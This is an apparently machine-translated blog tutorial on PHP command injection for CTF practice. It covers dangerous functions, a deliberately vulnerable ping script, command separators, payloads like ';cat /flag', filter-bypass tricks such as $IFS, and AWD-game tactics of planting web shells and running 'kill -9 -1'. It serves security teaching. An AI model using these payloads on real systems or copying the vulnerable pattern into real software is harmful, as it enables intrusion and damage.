当前位置:网站首页>Command Execution Vulnerability - command execution - vulnerability sites - code injection - vulnerability exploitation - joint execution - bypass (spaces, keyword filtering, variable bypass) - two ex
Command Execution Vulnerability - command execution - vulnerability sites - code injection - vulnerability exploitation - joint execution - bypass (spaces, keyword filtering, variable bypass) - two ex
2022-07-04 02:52:00 【qq_ fifty-one million five hundred and fifty thousand seven hun】
Command execution
Command execution is an attack , Its goal is to execute arbitrary commands on the host operating system through vulnerable applications . When the application needs to call some external programs to process the content , It will use some functions to execute system commands .
such as PHP Medium system,exec,shell_exec etc. , When the user can control the parameters in the command execution , Inject malicious system commands into normal commands , Cause command execution attacks .
A simple example is , For example, you want to create a directory , May not create with code , But I know that the system command is mkdir, With the help of system commands mkdir To create a directory .
give an example :cp /tmp/sourcefile /app/public/#{userinput}.jpg
cp yes copy Copy , take sourcefile Copy to the picture
If the user's input (userinput) yes aaa;cat /flag, Then it will read flag The content in
Command injection is a common Vulnerability form . Once there is a command injection vulnerability , An attacker can execute arbitrary commands on the target system .
Command injection attacks are often used to pass unsafe parameters to programs ( Command line arguments 、http head 、cookie).
Be careful : Command execution requires :
1. Execute system commands
2. System commands executed ( Parameters ) At least controllable ( Or partially controllable ), The place where parameters are transferred is the place where users can control
Command execution inheritance Web Server User's rights , Generally, you have permission to write files , Write horse 、 View private information 、 Steal source code , It can even bounce shell, Great harm .
( The user executed through the server php Code implementation executes system commands , So “ Command execution inheritance Web Server User's rights ”)
commonly Linux The highest permission is root,Web server It's usually www-data jurisdiction
Vulnerability site
The program filtering is not rigorous , So that users can inject and execute code .
High risk function :
eval(),assert(),preg_replace(),call_user_func() wait
For functions that execute commands , Parameter filtering is not rigorous , Cause direct command execution .
High risk function :
system(),exec(),shell_exec(),passthru(),pctnl_exec(),popen(),proc_open()
notes : Back quotes are shell_exec() Another name for
such as echo ls
Code injection
The program filtering is not rigorous , So that users can inject and execute code .
High risk vulnerability :
eval(),assert(),preg_replace(),call_user_func() wait
And command execution The difference is that :
An execution system command , An executive PHP Code
Exploit
Take a look at a Demo:
<?php
if (isset($_GET['ip'])){
$ip = $_GET['ip'];
echo shell_exec("ping -c 4 " . $ip);
}else{
highlight_file(__file__);
}
Under normal circumstances , Enter the host address , Then the command execution result is returned normally
In code ip The parameter is directly passed through GET Mode is passed in and directly brought into the command , At this time, try using the delimiter and adding a command
127.0.0.1;ls -l
Joint implementation
A semicolon
cmd1;cmd2;cmd3
cmd1 Will run first , No matter cmd1 Run successfully or error ,cmd2 Will run after it , When cmd2 When the command is complete ,cmd3 Will run
The three commands do not interfere with each other
&&
Sometimes I want to make sure that Linux In command , Only when the previous command ends successfully , The next command will be executed . That's logic and operators && Where it appears
cmd1 && cmd2 && cmd3
When the first command goes wrong ,&& The separator command will stop executing the following command .
||
You can use logical operators (||) Run command line , But run the next command only if the previous command fails :
cmd1 || cmd2 || cmd3
If cmd1 Run failed , Then run cmd2. If cmd2 The successful running ,cmd3 Will not run .
|
The result of the previous command is used as the parameter of the latter command
cmd1 | cmd2
for example :
echo xxx | base64
A newline
%0a
%0d
practice :actf2020exec platform BUUCTF
First try 127.0.0.1
127.0.0.1;ls
;cat /flag
obtain flag yes flag{3e9af367-c215-4a33-9196-4b5314327d9f}
Bypass
Filter space
$IFS
${IFS} // Add {} To distinguish ( interval )
$IFS$9
< // stay Linux in < Indicates import
<>
{cat,flag.php} // The space function is realized with comma , Need to use {} Cover up
%20
%09
Filter a keyword
Exercise questions :
Space filtering
Obviously, a lot of things are filtered :
It's wrong not to report :( Look at the source code and get flag)
flag{0af120ba-cd98-43e9-a099-3f9abac9de96}
Variable
( The one above GXYCTF It is an example of using variables to solve )
PS Add
1.awd In the game : Cannot delete others Horse
www-data and ctf/test Does not belong to a user group
terms of settlement : Write a horse for yourself , Connected by ant sword Web Shell, Through this Web shell Delete others Of Web shell
2. If the horse in others is every 1 Write a horse in seconds , How to solve ?
( If someone else's horse is written through a web page )
Write yourself a horse , Connect Web shell ( Make yourself www-data Group users ), To perform kill -9 -1
If the other party is ( Not through the web ):
Then I should execute :
3. rebound shell
If known IP And port number :
边栏推荐
- PMP 考試常見工具與技術點總結
- Keep an IT training diary 055- moral bitch
- Keepalived set the master not to recapture the VIP after fault recovery (it is invalid to solve nopreempt)
- Yyds dry goods inventory hand-in-hand teach you the development of Tiktok series video batch Downloader
- Dans la recherche de l'intelligence humaine ai, Meta a misé sur l'apprentissage auto - supervisé
- Format character%* s
- Yyds dry goods inventory override and virtual of classes in C
- Measurement fitting based on Halcon learning [4] measure_ arc. Hdev routine
- There is no need to authorize the automatic dream weaving collection plug-in for dream weaving collection
- What are the conditions for the opening of Tiktok live broadcast preview?
猜你喜欢
(column 23) typical C language problem: find the minimum common multiple and maximum common divisor of two numbers. (two solutions)
17. File i/o buffer
C # learning notes: structure of CS documents
Save Private Ryan - map building + voltage dp+deque+ shortest circuit
Contest3145 - the 37th game of 2021 freshman individual training match_ 1: Origami
High level application of SQL statements in MySQL database (I)
How to subcontract uniapp and applet, detailed steps (illustration) # yyds dry goods inventory #
The 37 year old programmer was laid off, and he didn't find a job for 120 days. He had no choice but to go to a small company. As a result, he was confused
Kiss number + close contact problem
The "message withdrawal" of a push message push, one click traceless message withdrawal makes the operation no longer difficult
随机推荐
Hamburg University of Technology (tuhh) | intelligent problem solving as integrated hierarchical reinforcement learning
WP collection plug-in free WordPress collection hang up plug-in
Key knowledge of embedded driver
Comment la transformation numérique du crédit d'information de la Chine passe - t - elle du ciel au bout des doigts?
Keep an IT training diary 055- moral bitch
Package and download 10 sets of Apple CMS templates / download the source code of Apple CMS video and film website
Global and Chinese market of contour projectors 2022-2028: Research Report on technology, participants, trends, market size and share
Talking about custom conditions and handling errors in MySQL Foundation
Create real-time video chat in unity3d
Idea if a class cannot be found, it will be red
Buuctf QR code
PMP 考試常見工具與技術點總結
Final consistency of MESI cache in CPU -- why does CPU need cache
Tsinghua University product: penalty gradient norm improves generalization of deep learning model
On Valentine's day, I code a programmer's exclusive Bing Dwen Dwen (including the source code for free)
What are the main investment products of bond funds and what are they
Advanced learning of MySQL -- Application -- index
Libcblas appears when installing opencv import CV2 so. 3:cannot open shared object file:NO such file or directory
JS object definition
Valentine's Day - 9 jigsaw puzzles with deep love in wechat circle of friends